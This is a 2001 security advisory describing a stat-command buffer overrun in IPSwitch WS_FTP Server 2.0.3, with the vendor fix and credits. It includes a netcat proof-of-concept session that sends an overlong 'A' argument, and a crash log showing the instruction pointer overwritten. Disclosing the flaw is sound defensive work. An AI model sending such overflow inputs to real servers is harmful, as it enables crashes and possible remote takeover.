Reported November 5, 2001, by Defcom Labs.

VERSION AFFECTED

  • IPSwitch WS_FTP FTP Server 2.0.3 for Windows XP, Windows 2000, and Windows NT

 

DESCRIPTION
A vulnerability exists in IPSwitch’s WS_FTP Server 2.0.3 that lets a potential remote attacker gain system-level access to servers running the FTP daemon. This vulnerability results from buffer overrun condition in the parsing code used to process the stat command. Sending a stat command to the vulnerable server with an argument greater than 479 bytes triggers the overflow.

<span style="font-family:Verdana"> <p></p>
</h3>

DEMONSTRATION

Defcom Labs provided the following demonstration as proof-of-concept:

 

 

  C:\tools\web>nc localhost 21

  220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)

  220-Wed Aug 08 19:57:40 2001

  220-30 days remaining on evaluation.

  220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)

  user ftp

  331 Password required

  pass ftp

  230 user logged in

  stat  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

  AAAAAAAAA

 

  0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21

  SetFolder = C:\program\iFtpSvc\helig

  SetFolder = C:\program\iFtpSvc\helig\public

  SetFolder = C:/program/iFtpSvc/helig

  0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon success

  (A1)

  Access violation - code c0000005 (first chance)

  eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002

  esi=0067c280 edi=00130178

  eip=41414141 esp=0104ded4 ebp=41414141 iopl=0

  41414141 ??               ???

 

VENDOR RESPONSE

The vendor, IPSwitch, released version 2.0.4 to correct this vulnerability.

 

CREDIT
Discovered by Andreas Junestam and Janne Sarendal of Defcom Labs.